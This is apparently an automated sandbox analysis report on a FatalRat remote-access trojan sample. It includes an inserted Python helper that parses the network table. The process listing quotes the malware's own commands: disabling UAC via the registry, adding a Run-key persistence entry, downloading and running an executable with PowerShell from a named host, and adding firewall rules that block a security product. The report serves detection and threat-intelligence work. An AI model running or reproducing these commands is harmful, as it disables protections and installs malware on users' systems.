Malware Analysis Report

2025-03-15 03:48

Sample ID 250223-p1gvdaypv9
Target 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk
SHA256 b17337db64b6ab60e969cec89c36058baf5e100c25684bda9beb0afa1c342b4d
Tags
fatalrat defense_evasion discovery execution infostealer persistence privilege_escalation rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b17337db64b6ab60e969cec89c36058baf5e100c25684bda9beb0afa1c342b4d

Threat Level: Known bad

The file 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk was found to be: Known bad.

Malicious Activity Summary

fatalrat defense_evasion discovery execution infostealer persistence privilege_escalation rat stealer trojan

FatalRat

Fatalrat family

UAC bypass

Fatal Rat payload

Blocklisted process makes network request

Modifies Windows Firewall

Downloads MZ/PE file

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Adds Run key to start application

Drops desktop.ini file(s)

Command and Scripting Interpreter: PowerShell

Checks installed software on the system

System Location Discovery: System Language Discovery

Unsigned PE

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

Modifies registry class

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-02-23 12:47

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2025-02-23 12:47

Reported

2025-02-23 12:50

Platform

win10v2004-20250217-en

Max time kernel

146s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"

Signatures

FatalRat

stealer trojan fatalrat

Fatalrat family

fatalrat

UAC bypass

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A

Fatal Rat payload

rat infostealer
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (2 events)

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A (8 events)

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdata_Service = "C:\\programdata\\lnk\\dick.lnk" C:\Windows\System32\reg.exe N/A

Checks installed software on the system

discovery

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A (8 events)
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A (8 events)
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A (8 events)

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\programdata\20250223024745\Agghosts.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\Videos\bin.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\programdata\20250223024745\Agghosts.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\programdata\20250223024745\Agghosts.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\URL Protocol C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\DefaultIcon C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite\shell C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite\shell\open C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg\shell\open\command C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\shell\open\command C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\ = "URL:TonSite Link" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\shell\open C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite\shell\open\command C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\ = "URL:Telegram Link" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg\shell C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\URL Protocol C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg\DefaultIcon C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg\shell\open C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite\DefaultIcon C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\shell\open C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg\shell C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tg C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tonsite\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\DefaultIcon C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\shell C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tonsite\shell\open\command C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\tdesktop.tg\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A (14 events)
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (2 events)
N/A N/A C:\programdata\20250223024745\Agghosts.exe N/A (48 events)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\programdata\20250223024745\Agghosts.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A (2 events)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4888 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe (2 events)
PID 4888 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\programdata\20250223024745\Agghosts.exe (3 events)
PID 2220 wrote to memory of 2456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe (2 events)
PID 4888 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\System32\reg.exe (2 events)
PID 4888 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe (2 events)
PID 4888 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe (2 events)
PID 2080 wrote to memory of 2960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com (2 events)
PID 1208 wrote to memory of 4144 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe (2 events)
PID 2080 wrote to memory of 3640 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (2 events)
PID 1208 wrote to memory of 436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe (2 events)
PID 1208 wrote to memory of 496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe (2 events)
PID 1208 wrote to memory of 3148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe (2 events)
PID 1208 wrote to memory of 1492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe (2 events)
PID 1208 wrote to memory of 3084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe (2 events)
PID 1208 wrote to memory of 3188 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe (2 events)
PID 1208 wrote to memory of 404 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe (2 events)
PID 2080 wrote to memory of 4188 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Videos\bin.exe (3 events)
PID 4188 wrote to memory of 3528 N/A C:\Users\Public\Videos\bin.exe C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp (3 events)
PID 3528 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe (2 events)

Processes

C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe

"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250223024745\1.bat" "

C:\programdata\20250223024745\Agghosts.exe

"C:\programdata\20250223024745\Agghosts.exe"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250223024745\fhq.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access" dir=in action=block program="" enable=yes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe', 'C:\Users\Public\Videos\bin.exe')"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access" dir=out action=block program="" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access2" dir=in action=block program="safemon\360tray.exe=360Safe.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access2" dir=out action=block program="safemon\360tray.exe=360Safe.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state on

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile settings inboundusernotification disable

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile settings inboundusernotification disable

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile settings inboundusernotification disable

C:\Users\Public\Videos\bin.exe

"C:\Users\Public\Videos\bin.exe"

C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp

"C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp" /SL5="$7023C,46193823,827904,C:\Users\Public\Videos\bin.exe"

C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe

"C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 baba-1336130708.cos.ap-tokyo.myqcloud.com udp
JP 43.128.240.48:443 baba-1336130708.cos.ap-tokyo.myqcloud.com tcp
N/A 127.0.0.1:49418 tcp
US 8.8.8.8:53 www.baidu.com udp
HK 103.235.46.96:80 www.baidu.com tcp
US 8.8.8.8:53 spoutry.it.com udp
JP 118.107.15.176:8081 spoutry.it.com tcp
JP 43.128.240.48:443 baba-1336130708.cos.ap-tokyo.myqcloud.com tcp
NL 149.154.167.51:443 tcp
NL 95.161.76.100:443 tcp
NL 149.154.167.51:80 149.154.167.51 tcp
NL 95.161.76.100:80 95.161.76.100 tcp
US 8.8.8.8:53 td.telegram.org udp
NL 149.154.167.99:443 td.telegram.org tcp
NL 149.154.167.92:443 tcp
NL 149.154.167.41:443 tcp
NL 149.154.167.41:80 149.154.167.41 tcp
NL 149.154.167.92:80 149.154.167.92 tcp
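The Network table above mixes DNS lookups, TCP connections with a resolved hostname, connections with no hostname at all, and rows where the sandbox printed the bare IP in the Domain column. The Python below is an added example, not part of the report, that parses the rows as copied from the table and separates them: which names were actually connected to, which peers were contacted directly by IP, and which connection uses a port outside the usual web ports (here spoutry.it.com on 8081). Treating 80 and 443 as the only expected TCP ports is an assumption of the example.

```python
from collections import defaultdict
from typing import Dict, List, NamedTuple, Optional, Set

# Rows copied from the Network table of this report (behavioral2).
NETWORK_ROWS = """\
US 8.8.8.8:53 baba-1336130708.cos.ap-tokyo.myqcloud.com udp
JP 43.128.240.48:443 baba-1336130708.cos.ap-tokyo.myqcloud.com tcp
N/A 127.0.0.1:49418 tcp
US 8.8.8.8:53 www.baidu.com udp
HK 103.235.46.96:80 www.baidu.com tcp
US 8.8.8.8:53 spoutry.it.com udp
JP 118.107.15.176:8081 spoutry.it.com tcp
JP 43.128.240.48:443 baba-1336130708.cos.ap-tokyo.myqcloud.com tcp
NL 149.154.167.51:443 tcp
NL 95.161.76.100:443 tcp
NL 149.154.167.51:80 149.154.167.51 tcp
NL 95.161.76.100:80 95.161.76.100 tcp
US 8.8.8.8:53 td.telegram.org udp
NL 149.154.167.99:443 td.telegram.org tcp
NL 149.154.167.92:443 tcp
NL 149.154.167.41:443 tcp
NL 149.154.167.41:80 149.154.167.41 tcp
NL 149.154.167.92:80 149.154.167.92 tcp
""".splitlines()


class Conn(NamedTuple):
    country: str
    ip: str
    port: int
    domain: Optional[str]
    proto: str


def parse_row(row: str) -> Conn:
    """Parse one 'Country Destination [Domain] Proto' row; the Domain column is optional."""
    parts = row.split()
    if len(parts) == 4:
        country, dest, domain, proto = parts
    elif len(parts) == 3:
        country, dest, proto = parts
        domain = None
    else:
        raise ValueError(f"unexpected row layout: {row!r}")
    ip, port = dest.rsplit(":", 1)
    if domain == ip:  # a bare IP repeated in the Domain column carries no name information
        domain = None
    return Conn(country, ip, int(port), domain, proto)


def parse_table(rows) -> List[Conn]:
    return [parse_row(r) for r in rows if r.strip()]


def resolved_names(conns) -> Dict[str, Set[str]]:
    """Hostname -> set of 'ip:port' endpoints that were actually connected to (TCP rows only)."""
    out: Dict[str, Set[str]] = defaultdict(set)
    for c in conns:
        if c.proto == "tcp" and c.domain:
            out[c.domain].add(f"{c.ip}:{c.port}")
    return dict(out)


def unnamed_hosts(conns) -> List[str]:
    """TCP peers that never appear with a hostname anywhere in the table (direct-to-IP traffic)."""
    named = {c.ip for c in conns if c.domain}
    direct = {c.ip for c in conns
              if c.proto == "tcp" and not c.domain and not c.ip.startswith("127.")}
    return sorted(direct - named)


def flag_unusual(conns, expected_tcp_ports=(80, 443)) -> List[Conn]:
    """TCP connections outside the expected ports and UDP to anything but 53, loopback skipped."""
    flagged = []
    for c in conns:
        if c.ip.startswith("127."):
            continue
        if (c.proto == "tcp" and c.port not in expected_tcp_ports) or (c.proto == "udp" and c.port != 53):
            flagged.append(c)
    return flagged


if __name__ == "__main__":
    conns = parse_table(NETWORK_ROWS)
    for name, endpoints in sorted(resolved_names(conns).items()):
        print(f"{name:50s} {', '.join(sorted(endpoints))}")
    print("direct-to-IP peers:", unnamed_hosts(conns))
    for c in flag_unusual(conns):
        print("unusual port:", c)
```

On this table the only flagged connection is spoutry.it.com on 118.107.15.176:8081, which is the endpoint to pivot on; the myqcloud.com download and www.baidu.com check-in sit on 443/80, and the four 149.154.167.x / 95.161.76.100 peers are reached without any DNS lookup in the capture and so show up under the direct-to-IP list rather than under a name.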

Files

memory/4888-11-0x0000000140000000-0x0000000140419000-memory.dmp

memory/4888-12-0x00000145A6830000-0x00000145A6C44000-memory.dmp

memory/4888-13-0x0000000140000000-0x0000000140419000-memory.dmp

memory/4888-14-0x00000145A6270000-0x00000145A6271000-memory.dmp

C:\ProgramData\20250223024745\Agghosts.exe

MD5 2a24dcd41bc3c5b5f7eceda525786578
SHA1 7e898f9ee5a97a1a261326f0168e8de44dcf8af4
SHA256 169e9e4b23878035551455f4e5dbd01ece204e59fe75361680e8786998059ca7
SHA512 aaded4c72d3fa77eefd9d4b098288dd6923bd79813466d93313d6acb00fea9bb90248fff92cc89a625c60ae3b7cc1c27e8bb178fdac624ec896267da57b9fd6a

C:\Users\Public\Downloads\20250223024745\1.bat

MD5 fa42ebb1071abc0e618c296ea2cf71a6
SHA1 9e0c0737b0e37b3e821d011eecd9b0c7c9f2a15a
SHA256 395f835731d25803a791db984062dd5cfdcade6f95cc5d0f68d359af32f6258d
SHA512 0ed9919675c224201996caeeecf625a1db00a70af5d3ba135dc3d6fa16bfcc562426c813e21b4e861f04d312635be3528d79b5c49b23e78161f2b051fa9aaf05

C:\ProgramData\lnk\2.lnk

MD5 b7eb81f993f4ceeb2da553567e098525
SHA1 69ad5eca3d5dfce012dbb812cb91a5491d082bcd
SHA256 351a3f0aaaef00a71797e390cee3603283d7baac8d97fd1161245e82cded294b
SHA512 047d214720203198cc7efb49a1f4771b7f27c8e1a3459ac1440ef37720b927f1e74c27ac8bd7ce7370fea28bc5a84ba499ebc5479ceb4d848186c8da60c968cf

C:\programdata\20250223024745\libcef.dll

MD5 b7f8c3416cdfd6f46c790da064f66099
SHA1 d7ae9a3d49bbf1981e7d6604128e18b6cd160bd6
SHA256 b9edf03447cf402e24da384c146c9d1536871a47518c795c4aea6550e3abd94d
SHA512 24272954e57f4f4f81dad90469e84946549e3441ba599f8b819d069b803687b3da35f449c0f18755352dba208d6d63af1d6b53c0a56adbd36540b1537bb99dc7

C:\programdata\20250223024745\Ensup.log

MD5 2fd94f6e1d71454d716a126f0d7450ac
SHA1 5d966df95c741880089e9078af921a22216516ec
SHA256 a599cbb05b69328655a7a0afc2644ed607c30a05edfb8fd6be2ea920c25b54b5
SHA512 340107b69fc49b8fe1acf37a3a6e40c4b7206cf3ae069fea6f4ba702a733401e1feef55e1d858b3529764bcd0ba371ef552f5838444b65b62545e1da150f9bb2

memory/1828-55-0x0000000001510000-0x0000000001539000-memory.dmp

memory/4888-67-0x0000000140000000-0x0000000140419000-memory.dmp

C:\Users\Public\Videos\download_and_run.bat

MD5 a90ccfd040d774b547f7d258b8e03661
SHA1 c46e353d34723f9393482974a516d51dfb52440d
SHA256 d852cfc4107e9ce5bec7349ef180366bbb4fe0878e725325a2b844f93a1ac1e2
SHA512 bdc816781c44b6e9bbc8207a3c0466a45397cf7815f267add21abe243bf138b5bae7ffec867433bf249e139b726413f68b7002f541c89ae1a25bd1e6980abfd7

C:\Users\Public\Downloads\20250223024745\fhq.bat

MD5 3a7cb580bd340505f6dc5b4c829a3eca
SHA1 21cc730517d74fa1d13316d7e0d817f3bd710906
SHA256 1c1528b546aa29be6614707cbe408cb4b46e8ed05bf3fe6b388b9f22a4ee37e2
SHA512 c224fa676542b90f8fc990e574028af664dced61612855290fb23ce4acad2d6b9043e901365939106b591b6746b3e4ddada15eede88a947051e9d8083194e630

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0qpalyu4.ec3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3640-79-0x0000017AD3730000-0x0000017AD3752000-memory.dmp

C:\Users\Public\Videos\bin.exe

MD5 06eaa3263801f4d695c3727834ffbca5
SHA1 58031db0039cf00a1fe738e55ee2fca35558c4fd
SHA256 97969d6e01ee37a16f4f7f64e6166f169bedfe95190f48d426693d4b95e8e8ff
SHA512 7b03899c6ce403172eb6d159e142b8ac25ef3aa6eb7f56abd205657d13832eb5b8ee61408b8d7a6f3f1c57de7fcc2565ce2ce9ecb4e54611f4c48098a870b6b3

memory/4188-87-0x0000000000EF0000-0x0000000000FC8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-GAL4S.tmp\bin.tmp

C:\Users\Admin\AppData\Roaming\Telegram Desktop\modules\x64\d3d\d3dcompiler_47.dll

Analysis: behavioral1

Detonation Overview

Submitted

2025-02-23 12:47

Reported

2025-02-23 12:50

Platform

win7-20241023-en

Max time kernel

119s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"

Signatures

FatalRat

stealer trojan fatalrat

Fatalrat family

fatalrat

UAC bypass

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A

Fatal Rat payload

rat infostealer
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

